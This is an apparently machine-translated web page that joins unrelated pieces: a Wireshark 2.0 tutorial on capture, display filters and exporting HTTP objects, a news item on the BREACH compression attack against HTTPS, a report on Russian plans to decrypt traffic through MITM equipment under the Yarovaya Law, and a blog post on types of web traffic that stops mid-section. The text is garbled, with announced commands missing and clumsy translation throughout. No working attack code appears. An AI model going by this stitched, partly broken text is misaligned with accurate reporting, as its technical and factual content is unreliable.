Wireshark is a powerful network analyzer that can be used to analyze the traffic passing through network interface your computer. You may need it to detect and resolve network problems, debug your web applications, network programs or sites. Wireshark allows you to fully view the contents of the packet at all levels: so you can better understand how the network works at a low level.

All packets are captured in real time and provided in an easy-to-read format. The program supports a very powerful filtering system, color highlighting, and other features that will help you find the packages you need. In this tutorial, we will look at how to use Wireshark to analyze traffic. Recently, the developers have moved to work on the second branch of the Wireshark 2.0 program, many changes and improvements have been made to it, especially for the interface. That is what we will be using in this article.

Before proceeding to consider ways to analyze traffic, you need to consider what features the program supports in more detail, what protocols it can work with and what to do. Here are the main features of the program:

• Capture real-time packets from wired or any other type of network interfaces, as well as reading from a file;
• The following capture interfaces are supported: Ethernet, IEEE 802.11, PPP, and local virtual interfaces;
• Packets can be filtered out by a variety of parameters using filters;
• All known protocols are highlighted in the list in different colors, such as TCP, HTTP, FTP, DNS, ICMP, and so on;
• Support for capturing traffic of VoIP calls;
• Decryption of HTTPS traffic is supported in the presence of a certificate;
• Decryption of WEP, WPA traffic wireless networks in the presence of a key and handshake;
• Displaying network load statistics;
• View the contents of packets for all network layers;
• Displays the time of sending and receiving packages.

The program has many other features, but these were the main ones that might interest you.

How to use Wireshark

I'm assuming you already have the program installed, but if not, you can install it from the official repositories. To do this, type the command in Ubuntu:

sudo apt install wireshark

After installation, you can find the program in the main menu of the distribution. You need to run Wireshark with superuser rights, because otherwise it will not be able to analyze network packets. This can be done from the main menu or via the terminal using the command for KDE:

And for Gnome/Unity:

The main window of the program is divided into three parts: the first column contains a list of network interfaces available for analysis, the second - options for opening files, and the third - help.

Network traffic analysis

To start the analysis, select the network interface, for example eth0, and click the button start.

After that, the next window will open, already with a stream of packets that pass through the interface. This window is also divided into several parts:

• Top part- these are menus and panels with various buttons;
• Package List- further the stream of network packets which you will analyze is displayed;
• Package content- just below the content of the selected package is located, it is divided into categories depending on the transport level;
• Real performance- at the very bottom, the contents of the package are displayed in real form, as well as in the form of HEX.

You can click on any package to analyze its contents:

Here we see a DNS query packet to get the site's IP address, in the query itself the domain is sent, and in the response packet we get our question as well as the answer.

For more convenient viewing, you can open the package in a new window by double-clicking on the entry:

Wireshark Filters

It's very inconvenient to sort through packages manually to find the ones you need, especially with an active stream. Therefore, for such a task it is better to use filters. There is a special line for entering filters under the menu. you can click expression to open the filter builder, but there are a lot of them, so we'll cover the most basic ones:

• ip.dst- target IP address;
• ip.src- IP-address of the sender;
• ip.addr- IP of the sender or recipient;
• ip.proto- protocol;
• tcp.dstport- port of destination;
• tcp.srcport- port of the sender;
• ip.ttl- filter by ttl, determines the network distance;
• http.request_uri- the requested site address.

You can use the following operators to specify the relationship between a field and a value in a filter:

• == - equals;
• != - not equal;
• < - less;
• > - more;
• <= - less than or equal to;
• >= - more or equal;
• matches- regular expression;
• contains- contains.

To combine multiple expressions, you can use:

• && - both expressions must be true for the package;
• || - one of the expressions may be true.

Now let's take a closer look at examples of several filters and try to understand all the signs of relations.

First, let's filter all packets sent to 194.67.215.. Type a string in the filter field and click apply. For convenience, Wireshark filters can be saved using the button Save:

ip.dst == 194.67.215.125

And to get not only sent packets, but also received in response from this node, you can combine two conditions:

ip.dst == 194.67.215.125 || ip.src == 194.67.215.125

We can also select transferred large files:

http.content_length > 5000

By filtering the Content-Type, we can select all the pictures that have been uploaded; let's analyze the Wireshark traffic, packets that contain the word image:

http.content_type contains image

To clear the filter, you can click the button Clear. It happens that you do not always know all the information necessary for filtering, but you just want to study the network. You can add any package field as a column and view its contents in the general window for each package.

For example, I want to display the ttl (time to live) of a package as a column. To do this, open the package information, find this field in the IP section. Then call context menu and select the option Apply As Column:

In the same way, you can create a filter based on any desired field. Select it and call the context menu, then click Apply as filter or Prepare as filter, then choose selected, to display only selected values, or Not selected to remove them:

The specified field and its value will be applied or, in the second case, substituted in the filter field:

In this way, you can add a field of any package or column to the filter. There is also this option in the context menu. You can also use simpler conditions to filter protocols. For example, let's analyze the Wireshark traffic for HTTP protocols and DNS:

Another interesting feature of the program is the use of Wireshark to track a specific session between the user's computer and the server. To do this, open the context menu for the package and select Follow TCP stream.

Then a window will open in which you will find all the data transferred between the server and the client:

Diagnosing Wireshark Issues

You might be wondering how to use Wireshark 2.0 to detect network problems. To do this, in the lower left corner of the window there is a round button, when you click on it, a window opens Expert Tools. In it, Wireshark collects all error and network failure messages:

The window is divided into tabs such as Errors, Warnings, Notices, Chats. The program can filter and find many network problems, and here you can see them very quickly. Wireshark filters are also supported here.

Wireshark traffic analysis

You can very easily understand what exactly users downloaded and what files they watched if the connection was not encrypted. The program does a very good job of extracting content.

To do this, you first need to stop capturing traffic using the red square on the panel. Then open the menu File -> Export Objects -> HTTP:

HTTP compression, which is used by most sites to reduce the size of transmitted data, can become a serious security risk if the site uses HTTPS. This was stated by security experts Dimitris Karakostas and Dionysis Zindros. The researchers managed to improve the operation of a long-known flaw that allows to speed up the decryption of HTTPS traffic, and apply an attack against block ciphers in an SSL / TLS connection.

The attack, dubbed BREACH (Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext), exploits flaws in the gzip/DEFLATE compression algorithm. The attack was first reported in 2013. At the Black Hat USA conference, researchers Angelo Prado, Neal Harris, and Yoel Gluck spoke about attacks on SSL/TLS stream ciphers such as RC4.

A demonstration of a new approach to exploitation is implemented in the Rupture open source framework, presented at the Black Hat Asia conference last week.

During the presentation, the experts demonstrated two successful attacks on Gmail and Facebook chat.

To carry out a BREACH attack, an attacker must be able to intercept the victim's network traffic. This can be done through WiFi networks, or through access to ISP equipment. The attacker will also need to discover a vulnerable part of the application that accepts input via URL parameters and returns that input in an encrypted response.

In the case of Gmail, this application turned out to be a search on the site for mobile devices. If the search request is made on behalf of an authorized user, an authentication token is also attached to the response. This token will be encrypted inside the response. However, each time the searched string matches part of the token, the size of the response to the client will be smaller, since the same strings in the response will be compressed.

An attacker can force the client application to send a large number of requests and thus guess all characters of the authentication token.

The Rupture framework allows you to inject special code into every unencrypted HTTP request opened by the victim's browser. The injected code forces the client browser to make connections to the vulnerable HTTPS application in the background. This is required to carry out a successful attack on block ciphers that create a lot of "noise" when encrypting data. To eliminate garbage, the researchers sent the same requests several times in a row and analyzed the difference in the sizes of the responses received. The experts also managed to use browser-side parallelization, which significantly accelerated the attack against block ciphers in TLS connections.

The journalists of the Kommersant publication became aware of how government departments see the implementation of the Yarovaya Law in practice.

According to Kommersant, the FSB, the Ministry of Telecom and Mass Communications and the Ministry of Industry and Trade are currently discussing a set of technical solutions that will allow decryption and, accordingly, access to all Internet traffic of Russians, as required by the Yarovaya Law. Journalists refer to information received from a top manager of one of the equipment manufacturers, a member of the Presidential Administration (AP), as well as an unnamed source in an IT company.

“It makes no sense to store exabytes of encrypted Internet traffic - you will not find anything in it. The FSB is in favor of decrypting all traffic in real-time and analyzing it by key parameters, relatively speaking, by the word "bomb", and the ministries insist on decrypting traffic only for those subscribers who will attract the attention of law enforcement agencies," he said. journalists the representative of the AP.

To analyze unencrypted and already decrypted traffic, it is planned to use DPI systems (Deep Packet Inspection), which are still used by many operators, for example, for URL filtering against lists of prohibited sites.

Encrypted traffic causes difficulties for government departments. “There are a huge number of sites on the Internet that are not the organizers of the dissemination of information and use a secure https connection,” the publication’s interlocutors explain. “Without decrypting traffic, it is not always possible to understand which site the user visited, not to mention what he did there ". So, one of the discussed options for decrypting traffic is to install equipment in operator networks that will actually carry out MITM attacks:

“For the user, this equipment pretends to be the requested site, and for the site it is the user. It turns out that the user will establish an SSL connection with this equipment, and already it - with the server that the user accessed. The equipment will decrypt the traffic intercepted from the server, and before sending it to the user, it will re-encrypt it with an SSL certificate issued by a Russian certification authority (CA). To prevent the user's browser from giving him notifications about an insecure connection, the Russian CA must be added to the trusted root certification authorities on the user's computer.

Journalists write that Ilya Massukh, head of the IT + Sovereignty subgroup under the Presidential Administration, has previously confirmed that there are indeed plans to create such a certification center. However, whether this CA will be used to implement the Yarovaya Law is still unknown.

Also, Anton Sushkevich, the founder of NVision Group and co-owner of the manufacturer of telecommunications equipment RDP.RU, heard about the proposal to decrypt the traffic.

“The two main methods of encryption on the Internet are end-to-end, which is very popular in instant messengers, and SSL certificates - with their help, about 80% of Internet traffic is encrypted. In order to fulfill the task set by the "Yarovaya law", that is, to fight terrorism, it is necessary to decrypt and analyze traffic in live, not some time later. Organizing MITM is one of the possible ways,” says Sushkevich.

Kommersant also asked for the opinion of experts on this issue, and they expressed some skepticism about the described scheme.

“When this fact becomes known, from all software that provides work with encrypted traffic, the certificate of such a certification center will be cut out in the next update. And this will be right, because the ability to create “left” certificates discredits all e-commerce: all bank cards, credentials of all users in all systems become intercepted,” explains the head of ARSIENTEK Denis Neshtun.

“MITM works well, and in some places legally, for SSL-based client-server technologies. But they began to refuse it more often and switch to TLS, for which MITM cannot be done today. And in the case of end-to-end encryption, on which most instant messengers are built, MITM is generally unrealizable,” says Alexey Lukatsky, Cisco Internet security consultant.

Let me remind you that according to the “Yarovaya law”, the organizers of the dissemination of information must provide the information necessary for decoding the received, transmitted, delivered and (or) processed electronic messages of users to the authorized division of the FSB.

"Organizers of the dissemination of information", in turn, are considered "persons engaged in activities to ensure the functioning information systems and (or) programs" that are used to "receive, transmit, deliver and (or) process electronic messages̆ Internet users”. That is, these are almost any services with the help of which messages are transmitted, as if it were a messenger or mail.

Kommersant's interlocutors believe that "foreign companies will simply not comply with this requirement, and Russian companies may hand over the keys after numerous demands."

Good day! Today we will talk about what is traffic? This word refers to different areas, but it can be found especially often on the Internet. In fact, all earnings in the network are built on it.

Traffic is in essence movement, activity, transition from one place to another. It can be a lot or a little, it can be fast or slow. The word traffic itself means in translation from English it means just movement!

Now let's think why you need traffic? In each area it is necessary for its special needs. For example, in the IT field, it denotes the number of megabytes. If they are, you can go online, but download a movie or music, or whatever depends on the amount you need to buy.

Webmasters often need it to earn money and everyone strives to have as much of this valuable movement on his site as possible!

Types of traffic

Now let's analyze all the types of traffic that I managed to find!

car traffic

Such traffic refers to the number of vehicles at any point. For example, during a lunch break on some street, 500 of them can pass in an hour. And this is a very large traffic of cars.

Owners of auto outlets can sometimes think about how to attract traffic to a car dealership? By this they mean ordinary customers, buyers. To attract, you just need to use advertising, that's all!

Autotraffic needs to be measured for various studies. There are both automatic methods and manual measurement methods.

Road traffic or road traffic can show the level of pollution in a particular location. After all, the more cars pass there, the more voluminous will be the accumulation of gases in this area.

Pedestrian traffic

Such a species is purely composed of those who use zebras. I think that this species can be attributed to animals. After all, they sometimes also move to a specially designated place.

Pedestrian traffic is essentially people walking on a striped road - a zebra!

Sometimes a lot of pedestrian traffic can cause difficulty for motorists, so there are services that monitor its amount. Although in practice I personally have not seen anything like this.

Maritime traffic

This is the movement of various seaworthy vessels. For example, such as boats, ships, steamboats and others! Often people search the Internet for this phrase to find out the movement of maritime traffic in real time! Surprisingly, there really is a display on the map on the network. You can go and see where the right boat is!

What is traffic in trading?

Under such a phrase is understood the number of customers who came to the store and bought something. The same can be said about traffic in business. These are just people who came and took something, giving money in return.

Most often, traffic is traded on the Internet, but it can be sold in everyday life. For example, by recommending a product to a person who is sold in a certain store. Moreover, you must have an agreement with the owner of the trading shop, and he must understand what kind of client will come from you today. If successful, the owner of the establishment will pay a percentage for the arrival of the buyer!

What is internet traffic?

Under this word, two designations can be distinguished on the network:

1. The number of megabytes, gigabytes.
2. The number of visitors to one of the sites.

The first Internet traffic, aka network is when you want to go online. To do this, you need a package with the above units of measurement. Very often it is limited by mobile operators. For a home computer, you can connect wired Internet for a fixed monthly fee. For example, for 400 rubles you can download as many movies, music and other files as you like. Here, the restriction can only be on the speed according to your tariff. You pay this amount once a month!

On the mobile Internet, for this money for a month, you can take, for example, 3-5 GB and that's it. If it runs out, then either you buy more for a not very favorable price, or you wait for the connection to expire. For example, you connected 2 GB on the first of May, but used them up by the 7th day of the same month. This means that the remaining 23 days will have to sit without the Internet, either pay extra or change the tariff.

My internet traffic is 7GB per week, Tariff Zabugorishche! This is the Internet from mts for 600 rubles. Payment once every seven days for 150 rubles. Such conditions suit me quite well, especially since seven gigabytes is for new users. I connected earlier and can download as much as I want without restrictions at a moderate speed.

The second given Internet traffic or web is the attendance of any resource on the Internet. For example, about 400 - 450 people a day visit my blog on the Internet! As a result, I can say that my traffic is four hundred visitors a day!

I think now what is traffic on the Internet is clear even for dummies!

What is mobile traffic?

In fact, these are people who came to you through a device - a phone! Some people may still ask what is traffic in mobile internet? Well, this is the amount of Internet traffic, which was discussed above!

If you receive a notification that there is little traffic left, it means that the Internet will be turned off soon. Usually this happens after the number of megabytes is 10 or 50.

Motivated traffic

A similar appearance means that a person did something at someone's request. For example, you have registered in one of the affiliate programs, online games. For bringing 1 person to it you will be paid 20 rubles. As a result, you go and do the task on a special service. Ask people to register for a reward of 5 rubles. Your profit will be 15 net profit! A person infiltrated the game because you asked him to do it for money.

Targeted traffic or thematic

I’ll tell you about this option using the example of a group in contact or a community. A person created something similar and gathered there everyone who is interested in the release of a new iPhone. A lot of people just want to get it! Let's say 20,000 people gathered! And so he entered the market, the author, without thinking twice, found a real store with an affiliate program of 5%, usually deductions in official stores are small. But besides that, he fussed and found an affiliate copy. Not everyone can afford the original. Offered the community two options! And as a result, he received a good income in the amount of more than 100,000 rubles! And because all these people were interested in buying, they hit with targeted or thematic traffic!

Well, and not a target, it means, for example, that DNS laptop advertising goes to a person who dreams of a computer from MSI. In fact, this is a dummy, a waste of money, because he will not take it.

What is doorway traffic?

Let me demonstrate again with an example! There is a lot of competition on the Internet for the sale of almost any product or service. Therefore, some people, in order to get around this obstacle and make money on affiliate programs, follow the following path:

1. Choose a product on which they want to earn.
2. They are not looking for a very competitive phrase from this niche, but to be entered into the search often.
3. Create a site with the domain of just this keyword.

As a result, the site is specifically dedicated to the product, for example, an action camera or a water hose. Well, if this is the case, the search engine, in particular Yandex, tries to set it as high as possible. As a result, people come in and some of them buy traffic.

In short, traffic comes from a doorway or a customized site for a specific affiliate program.

Referral traffic

Surely such a phrase is used by the owners of affiliate programs! They count how many direct sales they made, and how much referral traffic, also known as affiliate traffic, brought.

That is, if you are a partner and drive visitors to the product, then the owner of the product will call you a referral.

Or you can say that this is a user who came through someone's referral link to the service. And then he brought more people to the same project using his link! Which in the future can already be called referral traffic.

outgoing and incoming

Most often, this applies to the Internet tariff on your computer. If you use a program to account for it or you have a mobile modem, for example, from MTS, then you probably noticed that there is a schedule there. In addition, there are inscriptions for incoming and outgoing traffic. Well, in the process of surfing the Internet, you exchange data with a server on another computer. Some of them leave, and the other part comes to you in the form of software, films, pictures, music, etc.

Videos traffic

These are essentially user transitions using video content. For example, you can specify links under the video on YouTube or stick links into the clip itself. Active and popular YouTubers are able to bring a huge number of target users!

Search traffic or organic

That is, it is traffic from search engines! Let's say a person is looking for a flash drive and the search engine gives out a lot of sites. Well, if he visits any of them, then for the site this visitor will be considered organic! Such transitions can be from different search engines, for example, from Yandex, Google, Mail, etc.

Direct traffic

I'll start right away with an example. You have a friend and he recently purchased a juicer in an online store. This service gave him a 20% discount, and even gave him a set of cups! Looking at your friend, you also wanted to buy something in this store for such a promotion. And so ask him for the exact address. He naturally gives it, and now you go to the site, make a direct call without any systems. Dial an address and go to home page project. This will mean that you have become direct traffic for this store.

Traffic from context

Many people trying to sell their services or products make contextual advertising on the Internet. This is an advertisement that you probably saw while reading articles on the Internet.

Well, if a person clicks on an ad in the text and goes to the product, then he will just refer to traffic from the context!

What is fraudulent traffic?

This variety indicates not quite clean traffic. In translation from English, the word fraud means fraud. For advertisers, this type of visit means a loss of money. How can this happen?